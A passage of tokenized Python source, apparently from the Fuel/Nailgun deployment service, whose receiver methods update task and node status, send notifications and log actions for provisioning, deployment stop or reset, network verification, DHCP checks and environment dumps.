name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def provision_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> nodes_by_id = { str ( n [ '<STR_LIT>' ] ) : n for n in nodes } <EOL> master = nodes_by_id . pop ( consts . MASTER_NODE_UID , { } ) <EOL> if master . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> status = consts . TASK_STATUSES . error <EOL> progress = <NUM_LIT:100> <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , nodes_by_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> db_nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . all ( ) <EOL> for node_db in db_nodes : <EOL> node = nodes_by_id . pop ( node_db . uid ) <EOL> if node . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> node_db . status = consts . TASK_STATUSES . error <EOL> node_db . progress = <NUM_LIT:100> <EOL> node_db . error_type = consts . TASK_NAMES . provision <EOL> node_db . error_msg = node . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> node_db . status = node . get ( '<STR_LIT:status>' ) <EOL> node_db . progress = node . get ( '<STR_LIT>' ) <EOL> db ( ) . flush ( ) <EOL> if nodes_by_id : <EOL> logger . warning ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002C>" . join ( sorted ( six . moves . map ( str , nodes_by_id ) ) ) ) <EOL> if nodes and not progress : <EOL> progress = TaskHelper . recalculate_provisioning_task_progress ( task ) <EOL> cls . _update_task_status ( task , status , progress , message , db_nodes ) <EOL> cls . 
_update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def update_config_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs [ '<STR_LIT>' ] <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , task . cache [ '<STR_LIT>' ] ) <EOL> nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . all ( ) <EOL> if status in ( consts . TASK_STATUSES . ready , consts . TASK_STATUSES . error ) : <EOL> for node in nodes : <EOL> node . status = consts . NODE_STATUSES . ready <EOL> node . progress = <NUM_LIT:100> <EOL> if status == consts . TASK_STATUSES . error : <EOL> message = ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) . format ( '<STR_LIT:U+002CU+0020>' . join ( node . name for node in nodes ) ) <EOL> logger . error ( message ) <EOL> notifier . notify ( "<STR_LIT:error>" , message ) <EOL> db ( ) . flush ( ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def _notify ( cls , task , topic , message , node_id = None , task_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> if ( task . name == consts . TASK_NAMES . provision <EOL> and task . parent_id is not None ) or message is None : <EOL> return <EOL> notifier . notify ( <EOL> topic , <EOL> message , <EOL> task . 
cluster_id , <EOL> node_id = node_id , <EOL> task_uuid = task_uuid <EOL> ) <EOL> @ classmethod <EOL> def _update_task_status ( cls , task , status , progress , message , nodes ) : <EOL> """<STR_LIT>""" <EOL> if status == consts . TASK_STATUSES . error : <EOL> cls . _error_action ( task , status , progress , message ) <EOL> elif status == consts . TASK_STATUSES . ready : <EOL> cls . _success_action ( task , status , progress , nodes ) <EOL> else : <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _update_action_log_entry ( cls , task_status , task_name , task_uuid , <EOL> nodes_from_resp ) : <EOL> try : <EOL> if task_status in ( consts . TASK_STATUSES . ready , <EOL> consts . TASK_STATUSES . error ) : <EOL> al = objects . ActionLog . get_by_kwargs ( task_uuid = task_uuid , <EOL> action_name = task_name ) <EOL> if al : <EOL> data = { <EOL> '<STR_LIT>' : datetime . datetime . utcnow ( ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : cls . sanitize_nodes_from_resp ( <EOL> nodes_from_resp ) , <EOL> '<STR_LIT>' : task_status <EOL> } <EOL> } <EOL> objects . ActionLog . update ( al , data ) <EOL> except Exception as e : <EOL> logger . error ( "<STR_LIT>" , <EOL> six . text_type ( e ) ) <EOL> @ classmethod <EOL> def sanitize_nodes_from_resp ( cls , nodes ) : <EOL> resp = [ ] <EOL> if isinstance ( nodes , list ) : <EOL> for n in nodes : <EOL> if isinstance ( n , dict ) and '<STR_LIT>' in n : <EOL> resp . append ( n [ '<STR_LIT>' ] ) <EOL> return resp <EOL> @ classmethod <EOL> def _generate_error_message ( cls , task , error_types , names_only = False ) : <EOL> nodes_info = [ ] <EOL> error_nodes = db ( ) . query ( Node ) . filter_by ( <EOL> cluster_id = task . cluster_id <EOL> ) . filter ( <EOL> or_ ( <EOL> Node . status == '<STR_LIT:error>' , <EOL> Node . online == ( False ) <EOL> ) <EOL> ) . filter ( <EOL> Node . error_type . 
in_ ( error_types ) <EOL> ) . all ( ) <EOL> for n in error_nodes : <EOL> if names_only : <EOL> nodes_info . append ( u"<STR_LIT>" . format ( n . name ) ) <EOL> else : <EOL> nodes_info . append ( u"<STR_LIT>" . format ( n . name , n . error_msg ) ) <EOL> if nodes_info : <EOL> if names_only : <EOL> message = u"<STR_LIT:U+002CU+0020>" . join ( nodes_info ) <EOL> else : <EOL> message = u"<STR_LIT:\n>" . join ( nodes_info ) <EOL> else : <EOL> message = None <EOL> return message <EOL> @ classmethod <EOL> def _error_action ( cls , task , status , progress , message = None ) : <EOL> task_name = task . name . title ( ) <EOL> if message : <EOL> message = u"<STR_LIT>" . format ( task_name , message ) <EOL> notify_message = message . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> else : <EOL> error_message = cls . _generate_error_message ( <EOL> task , <EOL> error_types = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> names_only = True <EOL> ) <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , error_message <EOL> ) <EOL> notify_message = message if error_message is not None else None <EOL> cls . _notify ( task , consts . NOTIFICATION_TOPICS . error , notify_message ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _success_action ( cls , task , status , progress , nodes ) : <EOL> if any ( n . status == consts . NODE_STATUSES . error for n in nodes ) : <EOL> cls . _error_action ( task , '<STR_LIT:error>' , <NUM_LIT:100> ) <EOL> return <EOL> task_name = task . name . title ( ) <EOL> if nodes : <EOL> remaining = objects . Cluster . get_nodes_count_unmet_status ( <EOL> nodes [ <NUM_LIT:0> ] . cluster , nodes [ <NUM_LIT:0> ] . status <EOL> ) <EOL> if remaining > <NUM_LIT:0> : <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , len ( nodes ) <EOL> ) <EOL> else : <EOL> message = u"<STR_LIT>" . format ( <EOL> task_name , task . cluster . 
name <EOL> ) <EOL> else : <EOL> message = u"<STR_LIT>" . format ( task_name ) <EOL> zabbix_url = objects . Cluster . get_network_manager ( <EOL> task . cluster <EOL> ) . get_zabbix_url ( task . cluster ) <EOL> if zabbix_url : <EOL> message = "<STR_LIT>" . format ( <EOL> message , zabbix_url ) <EOL> if task . name != consts . TASK_NAMES . provision : <EOL> plugins_msg = cls . _make_plugins_success_message ( <EOL> ClusterPlugins . get_enabled ( task . cluster . id ) ) <EOL> if plugins_msg : <EOL> message = '<STR_LIT>' . format ( message , plugins_msg ) <EOL> cls . _notify ( task , consts . NOTIFICATION_TOPICS . done , message ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _make_plugins_success_message ( cls , plugins ) : <EOL> """<STR_LIT>""" <EOL> msg = '<STR_LIT>' <EOL> return '<STR_LIT:\n>' . join ( <EOL> map ( lambda p : msg . format ( p . name , p . description ) , plugins ) ) <EOL> @ classmethod <EOL> def stop_deployment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> ia_nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> ) <EOL> stopping_task_names = [ <EOL> consts . TASK_NAMES . deploy , <EOL> consts . TASK_NAMES . deployment , <EOL> consts . TASK_NAMES . provision <EOL> ] <EOL> q_stop_tasks = objects . TaskCollection . filter_by_list ( <EOL> None , <EOL> '<STR_LIT:name>' , <EOL> stopping_task_names <EOL> ) <EOL> q_stop_tasks = objects . TaskCollection . filter_by ( <EOL> q_stop_tasks , <EOL> cluster_id = task . 
cluster_id <EOL> ) <EOL> stop_tasks = objects . TaskCollection . order_by ( <EOL> q_stop_tasks , <EOL> '<STR_LIT:id>' <EOL> ) . all ( ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if not stop_tasks : <EOL> logger . warning ( "<STR_LIT>" , task . cluster_id ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . stopped <EOL> if stop_tasks : <EOL> objects . Task . bulk_delete ( x . id for x in stop_tasks ) <EOL> node_uids = [ n [ '<STR_LIT>' ] for n in itertools . chain ( nodes , ia_nodes ) ] <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( None , node_uids ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node in update_nodes : <EOL> objects . Node . reset_to_discover ( node ) <EOL> if ia_nodes : <EOL> cls . _notify_inaccessible ( <EOL> task . cluster_id , <EOL> [ n [ "<STR_LIT>" ] for n in ia_nodes ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> . format ( task . cluster . name or task . cluster_id ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> elif status == consts . TASK_STATUSES . error : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . error <EOL> if stop_tasks : <EOL> objects . Task . bulk_delete ( x . id for x in stop_tasks ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> None , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> status = consts . NODE_STATUSES . deploying <EOL> ) <EOL> q_nodes = objects . NodeCollection . 
order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node_db in update_nodes : <EOL> node_db . status = consts . NODE_STATUSES . error <EOL> node_db . progress = <NUM_LIT:100> <EOL> node_db . error_type = consts . NODE_ERRORS . stop_deployment <EOL> db ( ) . flush ( ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> . format ( task . cluster . name or task . cluster_id , message ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT:error>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def reset_environment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> ia_nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> task . cluster . status = consts . CLUSTER_STATUSES . new <EOL> objects . Cluster . add_pending_changes ( <EOL> task . cluster , <EOL> consts . CLUSTER_CHANGES . attributes <EOL> ) <EOL> objects . Cluster . add_pending_changes ( <EOL> task . cluster , <EOL> consts . CLUSTER_CHANGES . networks <EOL> ) <EOL> node_uids = [ n [ "<STR_LIT>" ] for n in itertools . 
chain ( nodes , ia_nodes ) ] <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( None , node_uids ) <EOL> q_nodes = objects . NodeCollection . filter_by ( <EOL> q_nodes , <EOL> cluster_id = task . cluster_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> update_nodes = objects . NodeCollection . lock_for_update ( <EOL> q_nodes <EOL> ) . all ( ) <EOL> for node in update_nodes : <EOL> logs_utils . delete_node_logs ( node ) <EOL> objects . Node . reset_to_discover ( node ) <EOL> if ia_nodes : <EOL> cls . _notify_inaccessible ( <EOL> task . cluster_id , <EOL> [ n [ "<STR_LIT>" ] for n in ia_nodes ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" . format ( <EOL> task . cluster . name or task . cluster_id <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> message , <EOL> task . cluster_id <EOL> ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def _notify_inaccessible ( cls , cluster_id , nodes_uids , action ) : <EOL> ia_nodes_db = db ( ) . query ( Node . name ) . filter ( <EOL> Node . id . in_ ( nodes_uids ) , <EOL> Node . cluster_id == cluster_id <EOL> ) . order_by ( Node . id ) . yield_per ( <NUM_LIT:100> ) <EOL> ia_message = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" . format ( <EOL> action , <EOL> u"<STR_LIT:U+002CU+0020>" . join ( [ <EOL> u"<STR_LIT>" . format ( n . name ) <EOL> for n in ia_nodes_db <EOL> ] ) <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> ia_message , <EOL> cluster_id <EOL> ) <EOL> @ classmethod <EOL> def verify_networks_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . 
get ( '<STR_LIT>' ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> result = [ ] <EOL> if nodes is None : <EOL> pass <EOL> elif isinstance ( nodes , list ) : <EOL> cached_nodes = task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> node_uids = [ str ( n [ '<STR_LIT>' ] ) for n in nodes ] <EOL> cached_node_uids = [ str ( n [ '<STR_LIT>' ] ) for n in cached_nodes ] <EOL> forgotten_uids = set ( cached_node_uids ) - set ( node_uids ) <EOL> if forgotten_uids : <EOL> absent_nodes = db ( ) . query ( Node ) . filter ( <EOL> Node . id . in_ ( forgotten_uids ) <EOL> ) . all ( ) <EOL> absent_node_names = [ ] <EOL> for n in absent_nodes : <EOL> if n . name : <EOL> absent_node_names . append ( n . name ) <EOL> else : <EOL> absent_node_names . append ( '<STR_LIT>' % n . id ) <EOL> if not error_msg : <EOL> error_msg = '<STR_LIT>' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( absent_node_names ) <EOL> ) <EOL> status = '<STR_LIT:error>' <EOL> else : <EOL> error_nodes = [ ] <EOL> node_excluded_networks = [ ] <EOL> for node in nodes : <EOL> cached_nodes_filtered = filter ( <EOL> lambda n : str ( n [ '<STR_LIT>' ] ) == str ( node [ '<STR_LIT>' ] ) , <EOL> cached_nodes <EOL> ) <EOL> if not cached_nodes_filtered : <EOL> logger . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> node <EOL> ) <EOL> continue <EOL> cached_node = cached_nodes_filtered [ <NUM_LIT:0> ] <EOL> excluded_networks = cached_node . get ( <EOL> '<STR_LIT>' , [ ] ) <EOL> if excluded_networks : <EOL> interfaces = '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ net . get ( '<STR_LIT>' ) for net in excluded_networks ] ) <EOL> node_excluded_networks . append ( { <EOL> '<STR_LIT>' : cached_node [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : interfaces <EOL> } ) <EOL> errors = connectivity_check . 
check_received_data ( <EOL> cached_node , node ) <EOL> error_nodes . extend ( errors ) <EOL> if error_nodes : <EOL> result = error_nodes <EOL> status = '<STR_LIT:error>' <EOL> else : <EOL> if node_excluded_networks : <EOL> interfaces_list = '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ '<STR_LIT>' . format ( <EOL> item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) <EOL> for item in node_excluded_networks ] ) <EOL> error_msg = connectivity_check . append_message ( <EOL> error_msg , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( interfaces_list ) , <EOL> ) <EOL> if task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> error_msg = connectivity_check . append_message ( <EOL> error_msg , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] ) <EOL> ) <EOL> else : <EOL> error_msg = ( error_msg or <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> status = '<STR_LIT:error>' <EOL> logger . error ( error_msg ) <EOL> if status not in ( '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> data = { <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT:result>' : result <EOL> } <EOL> objects . Task . update ( task , data ) <EOL> else : <EOL> objects . Task . update_verify_networks ( <EOL> task , status , progress , error_msg , result ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def multicast_verification_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> u"<STR_LIT>" . format ( <EOL> jsonutils . dumps ( kwargs ) ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . task . Task . get_by_uuid ( uuid = task_uuid ) <EOL> if kwargs . get ( '<STR_LIT:status>' ) : <EOL> task . status = kwargs [ '<STR_LIT:status>' ] <EOL> task . 
progress = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> response = kwargs . get ( '<STR_LIT>' , { } ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> if task . status == TASK_STATUSES . error : <EOL> task . message = error_msg <EOL> elif task . status == TASK_STATUSES . ready : <EOL> errors = [ ] <EOL> results = [ ] <EOL> node_ids = set ( config [ '<STR_LIT>' ] for config <EOL> in task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] ) <EOL> not_received_nodes = node_ids - set ( response . keys ( ) ) <EOL> if not_received_nodes : <EOL> msg = ( u'<STR_LIT>' ) . format ( <EOL> list ( not_received_nodes ) ) <EOL> errors . append ( msg ) <EOL> for node_id , received_ids in six . iteritems ( response ) : <EOL> result = { } <EOL> not_received_ids = node_ids - set ( received_ids or [ ] ) <EOL> result = { '<STR_LIT>' : node_id , <EOL> '<STR_LIT>' : list ( not_received_ids ) } <EOL> results . append ( result ) <EOL> if not_received_ids : <EOL> msg = ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) . format ( not_received_ids , node_id ) <EOL> errors . append ( msg ) <EOL> task . message = '<STR_LIT:\n>' . join ( errors ) <EOL> if errors : <EOL> task . status = TASK_STATUSES . error <EOL> task . result = results <EOL> if task . status == TASK_STATUSES . ready : <EOL> editable = copy . deepcopy ( task . cluster . attributes . editable ) <EOL> editable [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] = True <EOL> task . cluster . attributes . editable = editable <EOL> logger . debug ( u'<STR_LIT>' , task . message ) <EOL> objects . Task . update_verify_networks ( <EOL> task , task . status , <EOL> task . progress , task . message , task . result ) <EOL> @ classmethod <EOL> def check_dhcp_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> messages = [ ] <EOL> result = collections . 
defaultdict ( list ) <EOL> message_template = ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> nodes_uids = [ node [ '<STR_LIT>' ] for node in nodes ] <EOL> nodes_db = db ( ) . query ( Node ) . filter ( Node . id . in_ ( nodes_uids ) ) . all ( ) <EOL> nodes_map = dict ( ( str ( node . id ) , node ) for node in nodes_db ) <EOL> master_network_mac = settings . ADMIN_NETWORK [ '<STR_LIT>' ] <EOL> logger . debug ( '<STR_LIT>' , master_network_mac ) <EOL> for node in nodes : <EOL> if node [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> for row in node . get ( '<STR_LIT:data>' , [ ] ) : <EOL> if not net_utils . is_same_mac ( row [ '<STR_LIT>' ] , <EOL> master_network_mac ) : <EOL> node_db = nodes_map . get ( node [ '<STR_LIT>' ] ) <EOL> if node_db : <EOL> row [ '<STR_LIT>' ] = node_db . name <EOL> message = message_template . format ( ** row ) <EOL> messages . append ( message ) <EOL> result [ node [ '<STR_LIT>' ] ] . append ( row ) <EOL> else : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , row ) <EOL> status = status if not messages else "<STR_LIT:error>" <EOL> error_msg = '<STR_LIT:\n>' . join ( messages ) if messages else error_msg <EOL> logger . debug ( '<STR_LIT>' , error_msg ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> objects . Task . update_verify_networks ( task , status , progress , <EOL> error_msg , result ) <EOL> @ classmethod <EOL> def download_release_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . 
get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> release_info = task . cache [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> release_id = release_info [ '<STR_LIT>' ] <EOL> release = db ( ) . query ( Release ) . get ( release_id ) <EOL> if not release : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , release_id ) <EOL> return <EOL> if error_msg : <EOL> status = '<STR_LIT:error>' <EOL> error_msg = "<STR_LIT>" "<STR_LIT>" . format ( release . name ) <EOL> cls . _download_release_error ( <EOL> release_id , <EOL> error_msg <EOL> ) <EOL> elif progress == <NUM_LIT:100> and status == '<STR_LIT>' : <EOL> cls . _download_release_completed ( release_id ) <EOL> result = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : release_id <EOL> } <EOL> } <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT:result>' : result } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def dump_environment_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' ) <EOL> msg = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> if status == '<STR_LIT:error>' : <EOL> notifier . notify ( '<STR_LIT:error>' , error ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : error } <EOL> objects . Task . update ( task , data ) <EOL> elif status == '<STR_LIT>' : <EOL> dumpfile = os . path . basename ( msg ) <EOL> notifier . 
notify ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> dumpfile_url = reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : dumpfile } ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : dumpfile_url } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def stats_user_resp ( cls , ** kwargs ) : <EOL> logger . info ( "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> error = kwargs . get ( '<STR_LIT:error>' ) <EOL> message = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , fail_if_not_found = True , lock_for_update = True ) <EOL> if status not in ( consts . TASK_STATUSES . ready , <EOL> consts . TASK_STATUSES . error ) : <EOL> logger . debug ( "<STR_LIT>" , <EOL> task . name , task . id , task . status ) <EOL> return <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT:message>' : message } <EOL> if status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , <EOL> task . name , task . id , error ) <EOL> data [ '<STR_LIT:message>' ] = error <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def _get_failed_repos ( cls , node ) : <EOL> """<STR_LIT>""" <EOL> return node [ '<STR_LIT>' ] . get ( '<STR_LIT>' , [ ] ) <EOL> @ classmethod <EOL> def _check_repos_connectivity ( cls , resp_kwargs , failed_nodes_msg , <EOL> suggestion_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> task_uuid = resp_kwargs . get ( '<STR_LIT>' ) <EOL> response = resp_kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> status = consts . TASK_STATUSES . ready <EOL> progress = <NUM_LIT:100> <EOL> task = objects . Task . 
